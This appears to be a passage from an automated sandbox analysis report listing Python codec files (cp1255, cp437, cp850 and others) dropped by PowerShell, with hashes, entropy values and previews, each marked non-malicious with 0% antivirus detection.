                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12773
                                                                                                                                                                                                              Entropy (8bit):4.658204122531881
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:IHhsuOTDvRVUrXPLouhIAs2+i/IRDCYLSC51N7jG6ZZPHxvTh:VTTuhIAlQ3Sm7b
                                                                                                                                                                                                              MD5:8B8E1CC22BEF6EDE6E44C4DD2A287FF6
                                                                                                                                                                                                              SHA1:304930955DF0499CBFDF90BFD9BB9A01D0059B23
                                                                                                                                                                                                              SHA-256:C039AD62EE73102915D989CF390F76896C335CA8DBCDD4CA27D5441F76E081BE
                                                                                                                                                                                                              SHA-512:FA779A6E599816AAAA84C1FB715217DE2341399D47E70A440A06E312BA69780E14CB3014D048C7005F5A9025B3AB8D508DA052BFD678AD4E269F10CB1B35AE66
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1255 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1255.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1255',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13121
                                                                                                                                                                                                              Entropy (8bit):4.623477051591162
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:2HhsuOTDvRgUrXPLouhIAs2+i75IiPEFPDCYljorsWCdxeiu5it2uncgYejC:TTiuhIAl4P6rsEr
                                                                                                                                                                                                              MD5:2CCBF9B374CE98453955DAD9848C90FF
                                                                                                                                                                                                              SHA1:0E7B99D406E72AF59F80405B9676988CD6881C40
                                                                                                                                                                                                              SHA-256:24A69E11902CC4054280EC2DE38EE836D0BE22EABDB9CDC56D9A7B63C8CDDB06
                                                                                                                                                                                                              SHA-512:4A97C524F951DE4CF08F2EF86F9AA9F4F421BA3327D07E0B883958057E6204A410F42E82E0C7DBBAC8F3252065F96A4255A820753BD6EBE80254E1AFE160FD3F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1256 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1256.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1256',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13681
                                                                                                                                                                                                              Entropy (8bit):4.608029292102436
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:8HhsuOTDvRzUrXPLouhIAs2+icIkDCYwoe1X:pTluhIAlI0oet
                                                                                                                                                                                                              MD5:544A8ACE12064E96C3E6A7DB436F9F09
                                                                                                                                                                                                              SHA1:ADADE6DC415731BCC23386DF031CA5B003D09881
                                                                                                                                                                                                              SHA-256:902262C0640FC0F21CF85A86456DC33D43E51B07E6C961526BF7F7ED4CE2AB8D
                                                                                                                                                                                                              SHA-512:4830A946DA25CBECDD1AEB5DF055FD1961EF8E32936406889C39EE4F9ACD6A15605DCA448AA73DF0A4BE721BAB6B04C03D02524918FCBB1499C4E7B60863BCE2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1257 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1257.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1257',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13671
                                                                                                                                                                                                              Entropy (8bit):4.591778820995035
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:2HhsuOTDvRmUrXPLouhIAs2+i/IZDCYAZtTBd0HXIGPf:TTEuhIAlIMZtlJS
                                                                                                                                                                                                              MD5:11328D7E1CD433053C29BEC6C739FB67
                                                                                                                                                                                                              SHA1:FD2D141516EEF65B903F552AC68CE30AE45A40A8
                                                                                                                                                                                                              SHA-256:A9E1E891DD1F28DEA5ABB5819AEE1477156D288733EB2342F0696F1E5DD0A11D
                                                                                                                                                                                                              SHA-512:E643AFFBC683B99169FDB236184E25DDAC58803FB11799BD56BE44376953DD16F5E4C982CDFCA8D8F79D0B142E294ABAB72F25202F012F4149371B20F408A3E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp1258 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1258.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1258',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14439
                                                                                                                                                                                                              Entropy (8bit):4.5334908386243296
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:8HhsuOTDvR8Us0/nt7nw642d0C2UjoDyHg45tgVp3E5EmYI:pT1PtbcWoDumpU+mYI
                                                                                                                                                                                                              MD5:CF85B6224C5FE7C8EA6CBAD1C1BB6155
                                                                                                                                                                                                              SHA1:C8E3B07E4B5447EC58A280414228797EE6816A24
                                                                                                                                                                                                              SHA-256:016C8DA778E50CBCF76815BBD8F6D0D33DBF1FAF852726D85A5A47651C371033
                                                                                                                                                                                                              SHA-512:8FF744A4A173D2F046180A6A5C1A17715E7ADA582278166B2A418DE4C65441A47A040E8040E2385E02A24826082542D6CFBB3B548401ABEA8D0A17FEFD43B660
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp273 generated from 'python-mappings/CP273.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp273',.. encode=Codec().e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12362
                                                                                                                                                                                                              Entropy (8bit):4.601902617990224
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:aHhsuOTDvRqUwGYPJHjA/KT4RltXARfFVV2IC4FcE8bVO4BG2QST/:3TBcWK3cE8bT1QK
                                                                                                                                                                                                              MD5:85667B33899EC661331A9CA44CB36DEC
                                                                                                                                                                                                              SHA1:E755BF3ACA17896638E62BE91D9C8AFE0A6ED725
                                                                                                                                                                                                              SHA-256:AE6E956B42CF3AE32E988833772FC040F8393DA007048AD2B4E1D621FE6523E7
                                                                                                                                                                                                              SHA-512:4D7178C9AC351A644F6062D09FA9C28D569F48ABF1CC4F906C93B8BCCB151FE450E0A9B7A8EF26BD2851A7CE213F27A309F0EA6A2C999A7C5866432DF9E6FBCB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp424 generated from 'MAPPINGS/VENDORS/MISC/CP424.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp424',.. encode=Cod
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35262
                                                                                                                                                                                                              Entropy (8bit):4.591583826618043
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:p1LnZkjh4wVdjIVjxAEJHWJn4AVEccqPMy:XqjhJVRKxAEJ2BF6S
                                                                                                                                                                                                              MD5:A11E9C869BD055D6C91354FFFEB7644F
                                                                                                                                                                                                              SHA1:B008E64C808A86312863C194C621214134B4C432
                                                                                                                                                                                                              SHA-256:7B0A9AE2E74D370354CC60CBCFB77AF970364818BE2E2A446187DCCCF9E28ACC
                                                                                                                                                                                                              SHA-512:3A628F1BB8D36845074B4FA66A8B91B5F8365C5677CC81AFA5D7DA1313F328E1B409A3C43249C9D62FADC2B71CE9E7CE70CCD3854BA7B8CBB19CFB79B8AD92FE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp437 generated from 'VENDORS/MICSFT/PC/CP437.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp437',.. encode=Codec().enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13428
                                                                                                                                                                                                              Entropy (8bit):4.523115396759222
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZHhsuOTDvR7UZkPS9BrG4/RVFIhRNvYkV2H2QB:8TirG4/0RYkgWQB
                                                                                                                                                                                                              MD5:BEE7333323D2BCA3262F13C59414EDD3
                                                                                                                                                                                                              SHA1:57E74B1BA865C5198C26344B2F6F270350C014B4
                                                                                                                                                                                                              SHA-256:A5CAC573ED357CB6C2A672D01696212C25E306936586D94BE0D0130354A4DB6F
                                                                                                                                                                                                              SHA-512:B9DD5137040DC57308093D9C71291668CE7CBEDCA11DBC0D85187C6DEE568CA25F69B67F7FB08A2CA248D966EC622C7CE0DD35C0BA2CD77C860274A11A50827D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp500 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP500.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp500',.. e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13995
                                                                                                                                                                                                              Entropy (8bit):4.642939154809849
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:fhsuOTDvRD9lPEeXGyQCmEdfn4OH3NGzN7KwAKYWEDdunzT:STSeXGy1dc5
                                                                                                                                                                                                              MD5:9B7E8AB7C2EE4F82BE09E14F3D3AEA4C
                                                                                                                                                                                                              SHA1:AA76BF3210EF70474330E0212A8B2EDEB518DC5B
                                                                                                                                                                                                              SHA-256:016BDB7208A0D6BFAF8972C1F6BB4B3DE39C77E026B49ED106866D592BE4810B
                                                                                                                                                                                                              SHA-512:0E706CB3E9199663D2DE2E6443F2C9E46279F11ED32BFFE482C4262D7CBD1A30F49018588F96C037E147D9DCE27F29C4ABC1EAAD230CF09B73317F5872967CCD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""Python Character Mapping Codec cp720 generated on Windows:..Vista 6.0.6002 SP2 Multiprocessor Free with the command:.. python Tools/unicode/genwincodec.py 720.."""#"......import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codec
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35379
                                                                                                                                                                                                              Entropy (8bit):4.616163070442315
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:VmDXpX8Jytkjh4wVoEm3clxHRE8q6HWJn4AVhUise69/TUMy:8DXizjhJVoEm3clx6y2BFH25W
                                                                                                                                                                                                              MD5:BD60E98CC59C8BD60874F59A06E30F78
                                                                                                                                                                                                              SHA1:D0086209BA6B3D56964EA7295A8EA54BC5AA02D7
                                                                                                                                                                                                              SHA-256:F2DA9D418B2364C2E1A587B7A6E26FF5601C16AA7993070F2C955DDF2A1F860D
                                                                                                                                                                                                              SHA-512:377D0F87DDBB23D9CCAABE35085EF1E92FCE766B01E55774F4371EA281A03825D141A6F905C90C419B19D09529A8185827C9F4FC6EB176BBADE3DFB478AFB1A0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp737 generated from 'VENDORS/MICSFT/PC/CP737.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp737',.. encode=Codec().enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35173
                                                                                                                                                                                                              Entropy (8bit):4.550355257462109
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:8HLsuYDvRxp2YM0AQ7COJgJOlSwrE0PXRN/h4wcuSMy+PeD3xUpWS2449jBRWJnI:lRNALMSkjh4wVHeahcHWJn4AVztzXsj5
                                                                                                                                                                                                              MD5:CBEF285952C0476BF35BFCD7E7818919
                                                                                                                                                                                                              SHA1:1C61953A3AE6638EE415CA2A93710FF3D8E59D68
                                                                                                                                                                                                              SHA-256:00F2A5E71CA98ED656EC430A80FC2E971988A0A33EBDEA77661BDBE24FE2FBFF
                                                                                                                                                                                                              SHA-512:2F78E73843365DB7F164C2F3C7CD2AE5860D80A11BAF9212BA54C58F9B08C99035FEF6A200D836036AF2B4F1F286B0C2447953203B0EB1C87FD5F1DBE3D24396
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp775 generated from 'VENDORS/MICSFT/PC/CP775.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp775',.. encode=Codec().enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34803
                                                                                                                                                                                                              Entropy (8bit):4.521332806052938
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:QHLsuYDvRVSUpAJZjJBfX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxspGf6w6F44j:hbAZSkjh4wV5j9eJTHWJn4AVgqur
                                                                                                                                                                                                              MD5:F5F11DA44C65B2A394A4137E36E35E82
                                                                                                                                                                                                              SHA1:BD17C2F9156D704AEAB144A4C1B5B8CA436A5D73
                                                                                                                                                                                                              SHA-256:DCBE5938D7FE65072D4A286A184046DB211544C30F0C3C370B9CD594CF3B36BD
                                                                                                                                                                                                              SHA-512:58AE94059D5ABDC1892FE28DA1646249A0A96817B790BA468B1AA11983A8292AB1FCD1357C9EF9771DE11685FC999791DB184CAF16E7E05D634680AF8A74D6BA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP850.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp850',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35700
                                                                                                                                                                                                              Entropy (8bit):4.529290225811869
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:SHLsuYDvRzgbY6oxCzhnfnh7gwrE0PXRN/h4wcuSMyLLUhmCIbp0w449jBRWJn4d:vgCkjh4wVy/xHWJn4AV9dQr
                                                                                                                                                                                                              MD5:BB2BA9443AE7BD887BA8EAC3E622366A
                                                                                                                                                                                                              SHA1:777E47CA86C4CF65DA68603DDACD6C78B89E0DC7
                                                                                                                                                                                                              SHA-256:8B6AD769607B3DB0D60E4BA1A6321A3823AD8460890D48C816220DCDF8CBEA98
                                                                                                                                                                                                              SHA-512:EBAEC3C9AB014DD4B9629DF511D5E98A9CC88F4035841756142AFC462AB00D07B92050F62C89CF7B2C4891E7D4165F3B3C78548062AACE86E4680C6E2FF3F996
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP852.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp852',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34548
                                                                                                                                                                                                              Entropy (8bit):4.55461632698867
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:PHLsuYDvR+mIj30FeMwrE0PXRN/h4wcuSM2fi+ypK2449jBRWJn4bkVd8nOiB6HL:i+0rkjh4wV8iN3HWJn4AVd8n0r
                                                                                                                                                                                                              MD5:7C84762C6FD5251CD237754FEB1752D4
                                                                                                                                                                                                              SHA1:B4F083D0AC32E26B77DB2E99F53C079DB7B844A1
                                                                                                                                                                                                              SHA-256:F4F47A5CF3FE5A8CD269B68A73C1DC293A75CD3B9C0489CFA600919B47B35A4C
                                                                                                                                                                                                              SHA-512:D841B04E354ADD8C3D337A6952163CDC8D74FE8F561418A8DEA9C7C5986EE15179F9F5B2336880ABD279CE45AA46CB55020EDE9CDF0FE8B7EA093D1033B5F108
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP855.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp855',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12730
                                                                                                                                                                                                              Entropy (8bit):4.6600353742865055
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:JgHhsuOTDvRPUrXPLouhIAs2+i+/4mwNLlYip2MUo8ONT:jT5uhIAlg02MH
                                                                                                                                                                                                              MD5:EE5A43420B08D06B0B2D72A49F00216D
                                                                                                                                                                                                              SHA1:5CAB8D55CB2910C092AF40C921E0B0959933C216
                                                                                                                                                                                                              SHA-256:F0C9DAC1B08D688B81B4F11CA603336FBD5C7FC4C1A30E8B7836283C2AD9A8E7
                                                                                                                                                                                                              SHA-512:97CC6127C21CF49679AD8AC1B47D22D674A07D83BDCD7FAB54B3C821F8DC531435F3B12EE63222C92E3A9D6895404BA857926BA2CA52CDB1BD3ED51B49009C65
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
